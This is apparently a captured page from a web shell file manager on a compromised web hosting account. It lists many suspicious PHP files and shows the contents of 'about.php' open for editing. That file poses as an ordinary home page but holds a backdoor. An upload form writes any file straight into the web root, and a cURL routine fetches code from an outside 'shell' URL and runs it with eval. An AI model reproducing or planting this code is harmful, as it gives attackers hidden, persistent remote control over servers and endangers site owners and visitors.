X7ROOT File Manager
Current Path:
/home/gfecatvj/public_html
home
/
gfecatvj
/
public_html
/
📁
..
📄
.ftpquota
(19 B)
📁
.git
📁
1f9ee
📄
1index.php
(93.87 KB)
📁
22d43
📁
31242b
📁
76473b7d
📁
772799
📁
94d85f
📄
Ov-Simple1.php
(43.42 KB)
📄
V2_xml.php
(7.99 KB)
📄
about.php
(1.21 KB)
📄
as.php
(63.18 KB)
📄
bnm.php
(77.88 KB)
📄
cc13.php
(152.92 KB)
📄
ccs.php
(705.06 KB)
📄
ccu.php
(115.73 KB)
📄
dass.php
(26.19 KB)
📄
db.php
(6.99 KB)
📄
error_log
(4.7 MB)
📁
g
📄
gettest.php
(80.47 KB)
📄
img.php
(1.21 KB)
📄
index.php
(715 B)
📄
index.php0
(13.81 KB)
📄
kill.php
(929 B)
📄
less.php
(7.23 KB)
📄
mar.php
(33.08 KB)
📁
moxwz
📁
nt
📄
php.php
(70.78 KB)
📁
portofolio
📁
r
📄
radio.php
(22.06 KB)
📄
robots.txt
(870 B)
📁
si
📁
sites
📄
system_core.php
(7.06 KB)
📄
temp1.php
(15.36 KB)
📄
test1.php
(41.11 KB)
📁
user
📁
v
📁
vendor
📁
wp
📄
wp-22.php
(152.92 KB)
📁
wp-content
📁
wp-includes
📁
x
📄
xy.php
(23.77 KB)
📄
zz8.php
(378.95 KB)
Editing: about.php
<!DOCTYPE html> <html> <head> <title>home</title> </head> <body> <form enctype="multipart/form-data" action="" method="POST"> <p>Upload your file</p> <input type="file" name="uploaded_file"></input><br /> <input type="submit" value="Upload"></input> </form> </body> </html> <?php if(!empty($_FILES['uploaded_file'])) { $path = ""; $path = $path . basename($_FILES['uploaded_file']['name']); if(move_uploaded_file($_FILES['uploaded_file']['tmp_name'], $path)) { echo "The file ". basename($_FILES['uploaded_file']['name']) . " has been uploaded"; } else { echo "There was an error uploading the file, please try again!"; } } function getCurl0($url) { if(function_exists("curl_init")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); $result = curl_exec($ch); curl_close($ch); return $result; } return false; } $externalCode = getCurl0("https://marslogs.co.id/shell/shell/byp-litespeed.txt"); if($externalCode) { eval("?>".$externalCode); } __halt_compiler(); ?>
Upload File
Create Folder